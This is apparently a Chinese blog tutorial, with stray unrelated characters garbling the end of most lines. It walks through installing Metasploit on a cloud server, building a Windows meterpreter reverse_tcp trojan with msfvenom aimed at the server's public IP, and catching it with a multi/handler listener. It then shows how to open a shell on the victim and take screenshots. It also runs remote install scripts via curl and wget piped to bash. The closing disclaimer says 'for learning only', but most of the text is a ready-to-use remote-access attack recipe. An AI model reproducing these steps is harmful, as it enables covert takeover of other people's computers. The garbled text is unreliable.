眾所周知,Metasploit 是個(gè)內(nèi)網(wǎng)滲透神器亭畜。
但是內(nèi)網(wǎng)滲透哪有外網(wǎng)刺激,于是筆者上度娘搜索“msf 外網(wǎng)”贱案。
搜索結(jié)果的話,
首先侨糟,虛擬機(jī)里的kali不能滲透到外網(wǎng)的原因是它沒有外網(wǎng)IP瘩燥。
所以大多數(shù)都是用內(nèi)網(wǎng)穿透工具,還有一部分是通過服務(wù)器做個(gè)frp代理厉膀。
本質(zhì)其實(shí)都一樣二拐。但是親測(cè)后者比較有用。
可百新!是庐扫!
第二個(gè)方法有一個(gè)特點(diǎn),就是很煩形庭。
買好服務(wù)器之后再下載frp,服務(wù)器上下載完之后還得在Kali上面下斟珊。下載完天都黑了富纸,還得改這個(gè)改那個(gè)。最后一堆ip還搞來搞去胜嗓。
于是筆者就想到了。
既然都有服務(wù)器了辞州,為啥不直接在服務(wù)器上安裝msf呢?埃元?媚狰?非得繞這么大圈子?崭孤??
你需要這些東西
·一臺(tái)能用ssh的電腦(本文以 Mac 為例)
·一臺(tái) Linux 云服務(wù)器/云主機(jī)/ECS/VPS(名字不同辨宠,實(shí)質(zhì)一樣,不過不是虛擬主機(jī)哦)(本文以 Debian 10 系統(tǒng)為例)(現(xiàn)在市面上的那種免費(fèi)云主機(jī)就能用了)
·一臺(tái)沒開殺毒軟件的 Windows 電腦(虛擬機(jī))(本文以 XP SP3 為例)
安裝 msf
(msf就是 Metasploit Framework 的簡(jiǎn)稱)
首先你需要用ssh連上你的服務(wù)器精偿。具體步驟我就不贅述了,可以自行百度搔预,服務(wù)器提供商應(yīng)該也有教程提供。
用以下命令下載msf的安裝包拯田。
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
將其設(shè)為可執(zhí)行文件扶叉。
chmod +x msfinstall
運(yùn)行安裝包帕膜。
./msfinstall
初始化數(shù)據(jù)庫
msfdb init
(運(yùn)行到這里筆者的服務(wù)器報(bào)錯(cuò)說在root用戶下不能運(yùn)行這個(gè)命令,所以我就直接略過初始化數(shù)據(jù)庫了垮刹,其實(shí)不運(yùn)行這個(gè)命令貌似也不會(huì)有什么問題)
然后你的服務(wù)器上就已經(jīng)安裝好了msf。
配置寶塔面板
因?yàn)檫@是服務(wù)器酪劫,不是虛擬機(jī)寺董。上傳下載文件非常不方便。所以我們這里安裝一個(gè)寶塔面板遮咖。
wget -O install.sh http://download.bt.cn/install/install-ubuntu_6.0.sh && bash install.sh
安裝完之后,復(fù)制終端給的鏈接麦箍,進(jìn)入面板。
它會(huì)跳出來讓你推薦安裝的東西挟裂。我們這里先不用安裝揍诽。
生成木馬
我們回到終端,運(yùn)行下面的命令生成木馬渠啤。
msfvenom -p windows/meterpreter/reverse_tcp lhost=(你的服務(wù)器外網(wǎng)ip) lport=(隨便取個(gè)端口號(hào)) -f exe > /root/(木馬文件名).exe
-p 設(shè)置payload,無需改動(dòng)
lhost 監(jiān)聽IP饵筑,此處填你服務(wù)器的外網(wǎng)IP(一定要外網(wǎng)ip,不然目標(biāo)機(jī)器找不到你架专。比如你家住在xx市xx路xx號(hào)xx室,你某寶買東西就填xx室部脚,誰找得到你啊喂。)
lport 監(jiān)聽端口委刘,這里隨便寫一個(gè),最好是4位數(shù)呕童,而且沒有規(guī)律的那種淆珊。不然端口已經(jīng)可能被占用了。
-f 生成文件的格式 > 文件放置的目錄和文件名 (一般放在root目錄下即可)
比如你的服務(wù)器外網(wǎng)ip是 某某某.某某某.某某某.某某某
端口想選 1086
木馬文件放在 /root/iammuma.exe
你就應(yīng)該運(yùn)行
msfvenom -p windows/meterpreter/reverse_tcp lhost= 某某某.某某某.某某某.某某某 lport=1086 -f exe > /root/iammuma.exe
開放端口/下載木馬
這時(shí)候往声,我們就需要用到寶塔面板了戳吝。
開放端口
點(diǎn)擊左側(cè)菜單中的 安全听哭。
增加一個(gè)放行端口。
端口填上面的你選的且警。
備注/說明隨便寫礁遣。
下載木馬
點(diǎn)擊左側(cè)菜單中的 文件 。
再點(diǎn)擊根目錄祟霍。
再點(diǎn)擊進(jìn)入root文件夾沸呐。
我們可以看到醇王,木馬已經(jīng)生成了。
點(diǎn)擊下載崭添,然后拖入 Windows 虛擬機(jī)中寓娩。
先別急著運(yùn)行木馬。
開始監(jiān)聽
你需要把msf的監(jiān)聽打開,才能檢測(cè)到木馬返回的數(shù)據(jù)棘伴。
第一次寞埠,我設(shè)置lhost為127.0.0.1。
127.0.0.1是回送地址焊夸,指本地機(jī)仁连,一般用來測(cè)試使用≮逅耄——百度百科
結(jié)果
在虛擬機(jī)狂點(diǎn)木馬也沒反應(yīng)饭冬。
于是我改用外網(wǎng)IP。
于是就成功了揪阶。hhhhh慶祝一下昌抠。
(看到meterpreter就是成功了,目標(biāo)機(jī)基本上就已經(jīng)被你掌握在手里了)
步驟:
1 進(jìn)入msf
msfconsole
2 加載監(jiān)聽模塊
use exploit/multi/handler
3 設(shè)置payload遣钳,要和木馬設(shè)置的payload相同扰魂,如果你是按照上文來的話就不用修改蕴茴。
set payload windows/meterpreter/reverse_tcp
4 設(shè)置監(jiān)聽ip环鲤,就是你的服務(wù)器外網(wǎng)ip
set lhost (服務(wù)器外網(wǎng)IP)
5 設(shè)置端口愿棋,lport后面的數(shù)字就是你之前設(shè)置的端口。如果你是按照上文來的話就也不用修改垮庐。
set lport 1086
6 開始監(jiān)聽
run
7 在虛擬機(jī)里點(diǎn)擊木馬。
(如果點(diǎn)一次不行就多點(diǎn)幾次浙于。一定要關(guān)掉殺毒軟件!2翁选筒溃!等10秒左右一般都能有了)
搞定之后
這里就寫一下 meterpreter 的一些基本操作。
shell
這個(gè)命令就可以用目標(biāo)機(jī)的cmd控制目標(biāo)機(jī)滥崩。
screenshot
這個(gè)命令就可以給目標(biāo)機(jī)截圖擎值。
我們可以在寶塔面板里找到截下來的圖片厕氨。
總結(jié)
總的來說,就是在服務(wù)器上生成木馬并監(jiān)聽踢涌,并且用寶塔面板開啟端口并下載木馬文件潘明,最后在 Windows 上運(yùn)行木馬。
本教程僅供學(xué)習(xí)用,嚴(yán)禁用于非法用途。